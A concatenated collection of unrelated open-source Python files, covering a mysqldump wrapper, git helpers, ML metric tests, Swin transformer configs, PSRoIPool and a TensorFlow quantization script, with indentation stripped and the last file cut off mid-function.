sys.exit(1)
elif opt in ["-p", "--password"]:
if arg:
passwd = arg
else:
askpasswd = 1
elif opt in ["-u", "--user"]:
user = arg
elif opt in ["-h", "--host"]:
host = arg
elif opt in ["-V", "--version"]:
print "ohmysqldump v0.3"
os.execvp("mysqldump", ["mysqldump", "--version"])
if opt[2:]+"=" in longoptions:
options.append(opt+"="+arg)
elif opt[1:]+":" in shortoptions:
options.append(opt)
options.append(arg)
else:
options.append(opt+arg)
if not runohmy:
options.insert(0, "mysqldump")
command = 'mysqldump'
for arg in args:
options.append(arg)
os.execvp(command, options)
else:
if (not passwd and askpasswd):
passwd = getpass.getpass("password: ")
if not (user and (passwd and not askpasswd) and db and excluded):
usage()
sys.exit(1)
else:
ohmysqldump(db, user, passwd, excluded, options, host='')
if __name__ == "__main__":
main();
|
tbx/events/migrations/0002_auto_20210623_1428.py | elviva404/wagtail-torchbox | 103 | 12749971 | # Generated by Django 2.2.24 on 2021-06-23 13:28
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("events", "0001_initial"),
]
operations = [
migrations.AlterModelOptions(name="event", options={},),
]
|
lingvo/tasks/car/waymo/waymo_ap_metric_test.py | allenwang28/lingvo | 2,611 | 12749980 | # Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for waymo_ap_metric."""
from lingvo import compat as tf
from lingvo.core import py_utils
from lingvo.core import test_utils
from lingvo.tasks.car.waymo import waymo_ap_metric
from lingvo.tasks.car.waymo import waymo_metadata
import numpy as np
from waymo_open_dataset import label_pb2
FLAGS = tf.flags.FLAGS
class APTest(test_utils.TestCase):
def testWaymoAPConfig(self):
metadata = waymo_metadata.WaymoMetadata()
# Use 2D metric.
config = waymo_ap_metric.BuildWaymoMetricConfig(metadata, '2d', [])
vehicle_idx = label_pb2.Label.Type.Value('TYPE_VEHICLE')
ped_idx = label_pb2.Label.Type.Value('TYPE_PEDESTRIAN')
cyc_idx = label_pb2.Label.Type.Value('TYPE_CYCLIST')
thresholds_meta = metadata.IoUThresholds()
self.assertNear(config.iou_thresholds[vehicle_idx],
thresholds_meta['Vehicle'], 1e-6)
self.assertNear(config.iou_thresholds[ped_idx],
thresholds_meta['Pedestrian'], 1e-6)
self.assertNear(config.iou_thresholds[cyc_idx], thresholds_meta['Cyclist'],
1e-6)
def testPerfectBox(self):
metadata = waymo_metadata.WaymoMetadata()
params = waymo_ap_metric.WaymoAPMetrics.Params(metadata)
m = params.Instantiate()
# Make one update with a perfect box.
update_dict = py_utils.NestedMap(
groundtruth_labels=np.array([1]),
groundtruth_bboxes=np.ones(shape=(1, 7)),
groundtruth_difficulties=np.zeros(shape=(1)),
groundtruth_num_points=None,
detection_scores=np.ones(shape=(5, 1)),
detection_boxes=np.ones(shape=(5, 1, 7)),
detection_heights_in_pixels=np.ones(shape=(5, 1)))
m.Update('1234', update_dict)
waymo_ap = m.value
self.assertAllClose(waymo_ap, 1. / 3.)
# Write a summary.
summary = m.Summary('foo')
# Check that both AP and APH are in the tags.
tags = [v.tag for v in summary.value]
self.assertIn('foo/Pedestrian/AP_LEVEL_1', tags)
self.assertIn('foo/Pedestrian/APH_LEVEL_1', tags)
self.assertIn('foo/Pedestrian/AP_LEVEL_2', tags)
self.assertIn('foo/Pedestrian/APH_LEVEL_2', tags)
def testWaymoBreakdowns(self):
metadata = waymo_metadata.WaymoMetadata()
params = waymo_ap_metric.WaymoAPMetrics.Params(metadata)
params.waymo_breakdown_metrics = ['RANGE', 'VELOCITY']
m = params.Instantiate()
# Make one update with a perfect box.
update_dict = py_utils.NestedMap(
groundtruth_labels=np.array([1]),
groundtruth_bboxes=np.ones(shape=(1, 7)),
groundtruth_difficulties=np.zeros(shape=(1)),
groundtruth_num_points=None,
groundtruth_speed=np.zeros(shape=(1, 2)),
detection_scores=np.ones(shape=(5, 1)),
detection_boxes=np.ones(shape=(5, 1, 7)),
detection_heights_in_pixels=np.ones(shape=(5, 1)))
m.Update('1234', update_dict)
# Write a summary.
summary = m.Summary('foo')
# Check that the summary value for default ap and
# a waymo breakdown version by range is the same.
for v in summary.value:
if v.tag == 'foo/Vehicle/AP_LEVEL_1':
default_val = v.simple_value
elif v.tag == 'foo/Vehicle/APH_LEVEL_1':
aph_default_val = v.simple_value
elif v.tag == 'foo_extra/AP_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_1':
ap_bd_val_l1 = v.simple_value
elif v.tag == 'foo_extra/AP_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_2':
ap_bd_val_l2 = v.simple_value
elif v.tag == 'foo_extra/APH_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_1':
aph_bd_val_l1 = v.simple_value
elif v.tag == 'foo_extra/APH_RANGE_TYPE_VEHICLE_[0, 30)_LEVEL_2':
aph_bd_val_l2 = v.simple_value
elif v.tag == 'foo_extra/AP_VELOCITY_TYPE_VEHICLE_STATIONARY_LEVEL_1':
vbd_val_l1 = v.simple_value
elif v.tag == 'foo_extra/AP_VELOCITY_TYPE_VEHICLE_STATIONARY_LEVEL_2':
vbd_val_l2 = v.simple_value
self.assertEqual(ap_bd_val_l1, default_val)
self.assertEqual(ap_bd_val_l2, default_val)
self.assertEqual(aph_bd_val_l1, aph_default_val)
self.assertEqual(aph_bd_val_l2, aph_default_val)
self.assertEqual(vbd_val_l1, default_val)
self.assertEqual(vbd_val_l2, default_val)
# Check that eval classes not evaluated are not present.
tags = [v.tag for v in summary.value]
self.assertNotIn('foo_extra/APH_RANGE_TYPE_SIGN_[0, 30)_LEVEL_1', tags)
self.assertNotIn('foo_extra/APH_RANGE_TYPE_SIGN_[0, 30)_LEVEL_2', tags)
if __name__ == '__main__':
tf.test.main()
|
tests/unittesting/actions/default/cli/test_cli_worker.py | shepilov-vladislav/aiotasks | 462 | 12750062 | import click
from click.testing import CliRunner
from aiotasks.actions.cli import worker
import aiotasks.actions.cli
def _launch_aiotasks_worker_in_console(blah, **kwargs):
click.echo("ok")
def test_cli_worker_runs_show_help():
runner = CliRunner()
result = runner.invoke(worker)
assert 'Usage: worker [OPTIONS]' in result.output
def test_cli_worker_runs_ok(monkeypatch):
# Patch the launch of: launch_aiotasks_info_in_console
aiotasks.actions.cli.launch_aiotasks_worker_in_console = _launch_aiotasks_worker_in_console
runner = CliRunner()
result = runner.invoke(worker, ["-A", "package"])
assert 'ok' in result.output
|
c2_python-operating-system/7_final-project/project/exercise2.py | chaiyeow/google-it-automation | 220 | 12750071 | <filename>c2_python-operating-system/7_final-project/project/exercise2.py
#!/usr/bin/env python3
import operator
fruit = {"oranges": 3, "apples": 5, "bananas": 7, "pears": 2}
sorted(fruit.items())
# Output: sorted(fruit.items())
sorted(fruit.items(), key=operator.itemgetter(0))
# Output: [('apples', 5), ('bananas', 7), ('oranges', 3), ('pears', 2)]
sorted(fruit.items(), key=operator.itemgetter(1))
# Output: [('pears', 2), ('oranges', 3), ('apples', 5), ('bananas', 7)]
sorted(fruit.items(), key = operator.itemgetter(1), reverse=True)
# Output: [('bananas', 7), ('apples', 5), ('oranges', 3), ('pears', 2)] |
gitplus/git.py | tkrajina/git-plus | 170 | 12750077 | import os.path as mod_path
import sys as mod_sys
import subprocess
from typing import *
def assert_in_git_repository() -> None:
success, lines = execute_git('status', output=False)
if not success:
print('Not a git repository!!!')
mod_sys.exit(1)
def execute_command(cmd: Union[str, List[str]], output: bool=True, prefix: str='', grep: Optional[str]=None) -> Tuple[bool, str]:
result = ''
command = cmd if type(cmd) is list else cmd.split(' ') # type: ignore
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=-1)
(cmdout, cmderr) = p.communicate()
if cmdout is None:
return (0, "")
for line in cmdout.decode('utf-8').split('\n'):
output_line = prefix + ('%s' % line).rstrip() + '\n'
if not grep or grep in output_line:
if output and output_line:
print(output_line.rstrip())
mod_sys.stdout.flush()
result += output_line
return (not p.returncode, result)
def execute_git(command: str, output: bool=True, prefix: str='', grep: str="") -> Tuple[bool, str]:
return execute_command('git %s' % command, output, prefix, grep)
def get_branches(remote: bool=False, all: bool=False, merged: bool=False, no_merged: bool=False) -> List[str]:
git_command = 'branch'
if remote:
git_command += ' -r'
if all:
git_command += ' -a'
if merged is True:
git_command += ' --merged'
if no_merged is True:
git_command += ' --no-merged'
success, result = execute_git(git_command, output=False)
assert success
assert result
def _filter_branch(branch: str) -> str:
if '*' in branch:
# Current branch:
return branch.replace('*', '').strip()
elif '->' in branch:
# Branch is an alias
return branch.split('->')[0].strip()
elif 'HEAD detached at' in branch:
return 'HEAD'
return branch.strip()
lines = result.strip().split('\n')
lines = list(map(_filter_branch, lines))
lines = [line for line in lines if line]
return lines
def delete_branch(branch: str, force: bool=False) -> None:
if branch.startswith('remotes/'):
if branch.startswith('remotes/'):
branch = branch.replace('remotes/', '')
parts = branch.split('/')
if len(parts) >= 2:
origin_name, branch_name = parts[0], "/".join(parts[1:])
execute_git('push %s :%s' % (origin_name, branch_name))
else:
print('Don\'t know how to delete %s' % branch)
else:
execute_git('branch %s %s' % ('-D' if force else '-d', branch))
def get_config_properties() -> Dict[str, str]:
executed, output = execute_git('config -l', output=False)
if not executed:
print('Error retrieving git config properties')
mod_sys.exit(1)
result = {}
lines = output.split('\n')
for line in lines:
if '=' in line:
pos = line.find('=')
key = line[0: pos].strip().lower()
value = line[pos + 1:].strip()
result[key] = value
return result
def is_changed() -> bool:
""" Checks if current project has any noncommited changes. """
executed, changed_lines = execute_git('status --porcelain', output=False)
merge_not_finished = mod_path.exists('.git/MERGE_HEAD')
return cast(bool, changed_lines.strip() or merge_not_finished)
def get_git_sha1(branch_name: str) -> str:
success, sha1 = execute_git('log -1 %s --format=%%H --' % branch_name,
output=False)
if not success:
raise Exception(f'Invalid branch {branch_name}')
return sha1.strip()
def distance_to_commit(commit_1: str, commit_2: str) -> int:
success, log = execute_git(f'rev-list {commit_1}..{commit_2} --count', output=False)
if not success:
raise Exception(f'Error calculating distance between {commit_1}..{commit_2}')
return int(log)
|
venv/lib/python3.7/site-packages/allauth/socialaccount/providers/twitch/urls.py | vikram0207/django-rest | 6,342 | 12750091 | <gh_stars>1000+
from allauth.socialaccount.providers.oauth2.urls import default_urlpatterns
from .provider import TwitchProvider
urlpatterns = default_urlpatterns(TwitchProvider)
|
tensorflow_datasets/core/community/cache.py | jvishnuvardhan/datasets | 3,380 | 12750093 | <filename>tensorflow_datasets/core/community/cache.py
# coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cache utils.
The cache (default to `~/.cache/tensorflow_datasets/`) is used for:
* The community dataset index list (cached in
`<cache_dir>/community-datasets-list.jsonl` from
`gs://tfds-data/community-datasets-list.jsonl`)
* The installed dataset packages (downloaded from github and installed in
`<cache_dir>/modules/tfds_community/`).
"""
import os
import sys
from tensorflow_datasets.core import utils
from tensorflow_datasets.core.utils import type_utils
def _default_cache_dir() -> type_utils.ReadWritePath:
"""Returns the default cache directory."""
if 'TFDS_CACHE_DIR' in os.environ:
path = os.environ['TFDS_CACHE_DIR']
elif 'XDG_CACHE_HOME' in os.environ:
path = os.path.join(os.environ['XDG_CACHE_HOME'], 'tensorflow_datasets')
else:
path = os.path.join('~', '.cache', 'tensorflow_datasets')
return utils.as_path(path).expanduser()
@utils.memoize()
def cache_path() -> type_utils.ReadWritePath:
"""Returns the path to the TFDS cache."""
path = _default_cache_dir()
path.mkdir(parents=True, exist_ok=True)
return path
@utils.memoize()
def module_path() -> type_utils.ReadWritePath:
"""Returns the path to the cached TFDS dynamically installed modules.
Calling this function will update `sys.path` so modules installed in this
directory can be imported.
Returns:
module_path: The path to the dynamically installed modules.
"""
path = cache_path() / 'modules/'
path.mkdir(parents=True, exist_ok=True)
# Add the `~/.cache/tensorflow_datasets/modules/` to `sys.path`
sys.path.append(os.fspath(path))
return path
|
jarbas/core/context_processors.py | vbarceloscs/serenata-de-amor | 3,001 | 12750107 | from django.conf import settings
def google_analytics(request):
return {'google_analytics': settings.GOOGLE_ANALYTICS}
|
Easy/Chef And Apple Trees/Chef_And_Apple_Trees.py | anishsingh42/CodeChef | 127 | 12750121 | <filename>Easy/Chef And Apple Trees/Chef_And_Apple_Trees.py<gh_stars>100-1000
try:
t=int(input())
for i in range(t):
n=int(input())
a=list(map(int,input().split()))
set1=list(set(a))
print(len(set1))
except:
pass |
terrascript/data/oraclepaas.py | mjuenema/python-terrascript | 507 | 12750139 | <gh_stars>100-1000
# terrascript/data/oraclepaas.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:24:00 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.data.oraclepaas
#
# instead of
#
# >>> import terrascript.data.hashicorp.oraclepaas
#
# This is only available for 'official' and 'partner' providers.
from terrascript.data.hashicorp.oraclepaas import *
|
src/python/bezier/_curve_helpers.py | dibir-magomedsaygitov/bezier | 165 | 12750144 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper methods for B |eacute| zier curves.
The functions provided by this module have a Cython speedup with the
exact same interface which calls out to a Fortran implementation. The speedup
will be used if the extension can be built.
"""
from bezier.hazmat import curve_helpers
try:
from bezier import _speedup
except ImportError: # pragma: NO COVER
_speedup = None
# pylint: disable=invalid-name
if _speedup is None: # pragma: NO COVER
subdivide_nodes = curve_helpers.subdivide_nodes
evaluate_multi = curve_helpers.evaluate_multi
evaluate_multi_barycentric = curve_helpers.evaluate_multi_barycentric
compute_length = curve_helpers.compute_length
elevate_nodes = curve_helpers.elevate_nodes
specialize_curve = curve_helpers.specialize_curve
evaluate_hodograph = curve_helpers.evaluate_hodograph
get_curvature = curve_helpers.get_curvature
newton_refine = curve_helpers.newton_refine
locate_point = curve_helpers.locate_point
reduce_pseudo_inverse = curve_helpers.reduce_pseudo_inverse
full_reduce = curve_helpers.full_reduce
else:
subdivide_nodes = _speedup.subdivide_nodes_curve
evaluate_multi = _speedup.evaluate_multi
evaluate_multi_barycentric = _speedup.evaluate_multi_barycentric
compute_length = _speedup.compute_length
elevate_nodes = _speedup.elevate_nodes
specialize_curve = _speedup.specialize_curve
evaluate_hodograph = _speedup.evaluate_hodograph
get_curvature = _speedup.get_curvature
newton_refine = _speedup.newton_refine_curve
locate_point = _speedup.locate_point_curve
reduce_pseudo_inverse = _speedup.reduce_pseudo_inverse
full_reduce = _speedup.full_reduce
# pylint: enable=invalid-name
|
up/extensions/python/psroi_pool.py | ModelTC/EOD | 196 | 12750168 | <reponame>ModelTC/EOD
# Import from pod
# Import from third library
import torch
from torch.autograd import Function
from up.utils.general.log_helper import default_logger as logger
# Import from local
from .._C import psroi_pooling
class PSRoIPoolFunction(Function):
@staticmethod
def symbolic(g, features, rois, group_size, spatial_scale, output_dim):
return g.op(
"PSRoiPool",
features,
rois,
output_dim_i=output_dim,
group_size_i=group_size,
spatial_scale_f=spatial_scale)
@staticmethod
def forward(self, features, rois, group_size, spatial_scale, output_dim):
self.save_for_backward(features, rois)
self.group_size = group_size
self.spatial_scale = spatial_scale
self.output_dim = output_dim
batch_size, num_channels, data_height, data_width = features.size()
num_rois = rois.shape[0]
output = features.new(num_rois, self.output_dim, self.group_size, self.group_size).zero_()
mapping_channel = torch.IntTensor(
num_rois, self.output_dim, self.group_size, self.group_size).zero_()
forward_fn = psroi_pooling.forward_cuda
if not features.is_cuda:
logger.warning(
'---CPU version of PSRoIPooling is a dummpy function, which is used to support tocaffe')
forward_fn = psroi_pooling.forward_cpu
else:
mapping_channel = mapping_channel.cuda()
forward_fn(
self.group_size, self.group_size, self.output_dim,
self.spatial_scale, features, rois, output, mapping_channel)
self.mapping_channel = mapping_channel
return output
@staticmethod
def backward(self, grad_output):
grad_output = grad_output.data
feature, rois = self.saved_tensors
assert grad_output.is_cuda
batch_size, num_channels, data_height, data_width = feature.shape
grad_input = grad_output.new(batch_size, num_channels, data_height, data_width).zero_()
psroi_pooling.backward_cuda(
self.group_size, self.group_size, self.output_dim,
self.spatial_scale, grad_output, rois, grad_input, self.mapping_channel)
return grad_input, None, None, None, None
class PSRoIPool(torch.nn.Module):
def __init__(self, group_size, output_dim=None, spatial_scale=None):
super(PSRoIPool, self).__init__()
self.group_size = int(group_size)
if spatial_scale is not None:
logger.warning('`spatial_scale` is deprecated in PSRoIPool.__ini__, '
'we move `spatial_scale` to `forward` arguments `stride` for flexiability')
if output_dim is not None:
logger.warning('`output_dim` is deprecated in PSRoIPool.__ini__, '
'we will calculate `output_dim` by chanels of pooled '
'`features` and `group_size` dynamically')
def forward(self, rois, features, stride):
"""
Arguments:
rois: [N, >=5] (batch_idx, x1, y1, x2, y2)
Notes:
1. rois must be N*5 dim
2. in fp16 mode, feature.dtype is fp16, but rois.dtype may not
3. tensor must be contiguous before passing to the C code
"""
rois = rois[:, :5].contiguous().to(dtype=features.dtype)
features = features.contiguous()
assert rois.shape[1] == 5, rois.shape
spatial_scale = 1.0 / stride
output_dim = features.shape[1] // self.group_size**2
# In ONNX context, tensor.shape is type of tensor, while symbolic of PSRoIPool requires
# the argumement of output_dim is int
if torch.is_tensor(output_dim):
output_dim = output_dim.item()
assert self.group_size**2 * output_dim == features.shape[1]
return PSRoIPoolFunction.apply(features, rois, self.group_size, spatial_scale, output_dim)
def __repr__(self):
s = '{name} ({group_size})'
return s.format(name=self.__class__.__name__, **self.__dict__)
@classmethod
def from_params(cls, params):
group_size = params['pool_size']
return cls(group_size)
|
towhee/trainer/models/swin_transformer/configs.py | ThyeeZz/towhee | 365 | 12750196 | # Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
IMAGENET_DEFAULT_MEAN = [0.485, 0.456, 0.406]
IMAGENET_DEFAULT_STD = [0.229, 0.224, 0.225]
def _cfg(url='', **kwargs):
return {
'url': url,
'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': None,
'crop_pct': .9, 'interpolation': 'bicubic', 'fixed_input_size': True,
'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD,
'first_conv': 'patch_embed.proj', 'classifier': 'head',
**kwargs
}
model_cfgs = {
# patch models (my experiments)
'swin_base_patch4_window12_384': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window12_384_22kto1k.pth',
input_size=(3, 384, 384), crop_pct=1.0),
'swin_base_patch4_window7_224': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window7_224_22kto1k.pth',
),
'swin_large_patch4_window12_384': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window12_384_22kto1k.pth',
input_size=(3, 384, 384), crop_pct=1.0),
'swin_large_patch4_window7_224': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window7_224_22kto1k.pth',
),
'swin_small_patch4_window7_224': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_small_patch4_window7_224.pth',
),
'swin_tiny_patch4_window7_224': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_tiny_patch4_window7_224.pth',
),
'swin_base_patch4_window12_384_in22k': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window12_384_22k.pth',
input_size=(3, 384, 384), crop_pct=1.0, num_classes=21841),
'swin_base_patch4_window7_224_in22k': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_base_patch4_window7_224_22k.pth',
num_classes=21841),
'swin_large_patch4_window12_384_in22k': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window12_384_22k.pth',
input_size=(3, 384, 384), crop_pct=1.0, num_classes=21841),
'swin_large_patch4_window7_224_in22k': _cfg(
url='https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window7_224_22k.pth',
num_classes=21841),
}
def build_configs(name, **kwargs):
config = model_cfgs[name]
model_architectures = {
'swin_base_patch4_window12_384' : dict(
patch_size=4, window_size=12, embed_dim=128, depths=(2, 2, 18, 2), num_heads=(4, 8, 16, 32), **kwargs),
'swin_base_patch4_window7_224' : dict(
patch_size=4, window_size=7, embed_dim=128, depths=(2, 2, 18, 2), num_heads=(4, 8, 16, 32), **kwargs),
'swin_large_patch4_window12_384' : dict(
patch_size=4, window_size=12, embed_dim=192, depths=(2, 2, 18, 2), num_heads=(6, 12, 24, 48), **kwargs),
'swin_large_patch4_window7_224' : dict(
patch_size=4, window_size=7, embed_dim=192, depths=(2, 2, 18, 2), num_heads=(6, 12, 24, 48), **kwargs),
'swin_small_patch4_window7_224' : dict(
patch_size=4, window_size=7, embed_dim=96, depths=(2, 2, 18, 2), num_heads=(3, 6, 12, 24), **kwargs),
'swin_tiny_patch4_window7_224' : dict(
patch_size=4, window_size=7, embed_dim=96, depths=(2, 2, 6, 2), num_heads=(3, 6, 12, 24), **kwargs),
'swin_base_patch4_window12_384_in22k' : dict(
patch_size=4, window_size=12, embed_dim=128, depths=(2, 2, 18, 2), num_heads=(4, 8, 16, 32), **kwargs),
'swin_base_patch4_window7_224_in22k' : dict(
patch_size=4, window_size=7, embed_dim=128, depths=(2, 2, 18, 2), num_heads=(4, 8, 16, 32), **kwargs),
'swin_large_patch4_window12_384_in22k' : dict(
patch_size=4, window_size=12, embed_dim=192, depths=(2, 2, 18, 2), num_heads=(6, 12, 24, 48), **kwargs),
'swin_large_patch4_window7_224_in22k' : dict(
patch_size=4, window_size=7, embed_dim=192, depths=(2, 2, 18, 2), num_heads=(6, 12, 24, 48), **kwargs)
}
return model_architectures[name], config
|
examples/tensorflow/nlp/transformer_lt/quantization/ptq/main.py | huggingface/neural-compressor | 172 | 12750199 | #
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import time
import sys
import numpy as np
import unicodedata
import six
import re
import tensorflow as tf
from absl import app
from argparse import ArgumentParser
import pandas as pd
from utils import tokenizer
from utils.tokenizer import Subtokenizer
from utils import metrics
flags = tf.compat.v1.flags
FLAGS = flags.FLAGS
flags.DEFINE_integer("batch_size", 64,
"run batch size")
flags.DEFINE_string("input_graph", None,
"The path of input model file.")
flags.DEFINE_string("inputs_file", None,
"File saved to an output file.")
flags.DEFINE_string("reference_file", None,
"File containing reference translation.")
flags.DEFINE_string("vocab_file", None,
"Path to subtoken vocabulary file.")
flags.DEFINE_string("config", None,
"Config json file")
flags.DEFINE_string("output_model", None,
"The output model of the quantized model.")
flags.DEFINE_string("mode", "tune",
"One of three options: 'benchmark'/'accuracy'/'tune'.")
flags.DEFINE_integer("iters", -1,
"The iteration used for benchmark.")
class UnicodeRegex(object):
def __init__(self):
punctuation = self.property_chars("P")
self.nondigit_punct_re = re.compile(r"([^\d])([" + punctuation + r"])")
self.punct_nondigit_re = re.compile(r"([" + punctuation + r"])([^\d])")
self.symbol_re = re.compile("([" + self.property_chars("S") + "])")
def property_chars(self, prefix):
return "".join(six.unichr(x) for x in range(sys.maxunicode)
if unicodedata.category(six.unichr(x)).startswith(prefix))
uregex = UnicodeRegex()
def bleu_tokenize(string):
string = uregex.nondigit_punct_re.sub(r"\1 \2 ", string)
string = uregex.punct_nondigit_re.sub(r" \1 \2", string)
string = uregex.symbol_re.sub(r" \1 ", string)
return string.split()
class bleu(object):
def __init__(self):
self.translations = []
self.labels = []
def reset(self):
self.translations = []
self.labels = []
def update(self, pred, label):
if len(label) != len(pred):
raise ValueError("Reference and translation files have different number "
"of lines. If training only a few steps (100-200), the "
"translation may be empty.")
label = [x.lower() for x in label]
pred = [x.lower() for x in pred]
label = [bleu_tokenize(x) for x in label]
pred = [bleu_tokenize(x) for x in pred]
self.labels.extend(label)
self.translations.extend(pred)
def result(self):
return metrics.compute_bleu(self.labels, self.translations) * 100
def collate_fn(batch):
"""Puts each data field into a pd frame with outer dimension batch size"""
elem = batch[0]
if isinstance(elem, tuple):
batch = zip(*batch)
return [collate_fn(samples) for samples in batch]
elif isinstance(elem, np.ndarray):
return [list(elem) for elem in batch]
elif isinstance(elem, str):
return batch
else:
return pd.DataFrame(batch).fillna(0).values.astype(np.int32)
def load_graph(file_name):
tf.compat.v1.logging.info('Loading graph from: ' + file_name)
with tf.io.gfile.GFile(file_name, "rb") as f:
graph_def = tf.compat.v1.GraphDef()
graph_def.ParseFromString(f.read())
with tf.Graph().as_default() as graph:
tf.import_graph_def(graph_def, name='')
return graph
def eval_func(infer_graph, iteration=-1):
if isinstance(infer_graph, tf.compat.v1.GraphDef):
graph = tf.Graph()
with graph.as_default():
tf.import_graph_def(infer_graph, name='')
infer_graph = graph
subtokenizer = Subtokenizer(FLAGS.vocab_file)
input_tensor = infer_graph.get_tensor_by_name('input_tensor:0')
output_tensor = infer_graph.get_tensor_by_name(\
'model/Transformer/strided_slice_19:0')
ds = Dataset(FLAGS.inputs_file, FLAGS.reference_file, FLAGS.vocab_file)
from neural_compressor.data import DATALOADERS
dataloader = DATALOADERS['tensorflow'](ds, batch_size=FLAGS.batch_size,
collate_fn=collate_fn)
config = tf.compat.v1.ConfigProto()
config.use_per_session_threads = 1
config.inter_op_parallelism_threads = 1
sess = tf.compat.v1.Session(graph=infer_graph, config=config)
time_list = []
bleu_eval = bleu()
predictions = []
labels = []
warmup = 10
if iteration != -1:
assert iteration >= warmup, 'iteration must be larger than warmup'
for idx, (input_data, label) in enumerate(dataloader):
if idx < iteration or iteration == -1:
time_start = time.time()
out = sess.run([output_tensor], {input_tensor: input_data})
duration = time.time() - time_start
time_list.append(duration)
predictions.append(out)
labels.extend(label)
else:
break
latency = np.array(time_list[warmup: ]).mean() / FLAGS.batch_size
print('Batch size = {}'.format(FLAGS.batch_size))
print('Latency: {:.3f} ms'.format(latency * 1000))
print('Throughput: {:.3f} items/sec'.format(1./ latency))
# only calculate accuracy when running out all predictions
if iteration == -1:
decode = []
for i,tr in enumerate(predictions):
for j,itr in enumerate(tr):
for k, otr in enumerate(itr):
try:
index = list(otr).index(tokenizer.EOS_ID)
decode.append(subtokenizer.decode(otr[:index]))
except:
decode.append(subtokenizer.decode(otr))
bleu_eval.update(decode, labels)
print('Accuracy is {:.3f}'.format(bleu_eval.result()))
return bleu_eval.result()
class Dataset(object):
def __init__(self, inputs_file, reference_file, vocab_file):
with tf.io.gfile.GFile(inputs_file) as f:
records = f.read().split("\n")
inputs = [record.strip() for record in records]
if not inputs[-1]:
inputs.pop()
self.ref_lines = tokenizer.native_to_unicode(
tf.io.gfile.GFile(reference_file).read()).strip().splitlines()
subtokenizer = Subtokenizer(vocab_file)
self.batch = []
token_lens=[]
for i, line in enumerate(inputs):
enc = subtokenizer.encode(line, add_eos=True)
token_lens.append((i, len(enc)))
sorted_by_token_input_lens = sorted(token_lens, key=lambda x: x[1], reverse=True)
sorted_inputs = [None] * len(sorted_by_token_input_lens)
sorted_keys = [0] * len(sorted_by_token_input_lens)
lines = []
for i, (index, _) in enumerate(sorted_by_token_input_lens):
sorted_inputs[i] = inputs[index]
sorted_keys[index] = i
enc=subtokenizer.encode(sorted_inputs[i], add_eos=True)
lines.append([enc])
for i in sorted_keys:
self.batch.append(lines[i])
def __getitem__(self, index):
data = self.batch[index]
label = self.ref_lines[index]
return data[0], label
def __len__(self):
return len(self.batch)
def main(_):
graph = load_graph(FLAGS.input_graph)
if FLAGS.mode == 'tune':
from neural_compressor.experimental import Quantization, common
quantizer = Quantization(FLAGS.config)
ds = Dataset(FLAGS.inputs_file, FLAGS.reference_file, FLAGS.vocab_file)
quantizer.calib_dataloader = common.DataLoader(ds, collate_fn=collate_fn, \
batch_size=FLAGS.batch_size)
quantizer.model = common.Model(graph)
quantizer.eval_func = eval_func
q_model = quantizer.fit()
try:
q_model.save(FLAGS.output_model)
except Exception as e:
print("Failed to save model due to {}".format(str(e)))
elif FLAGS.mode == 'benchmark':
eval_func(graph, FLAGS.iters)
elif FLAGS.mode == 'accuracy':
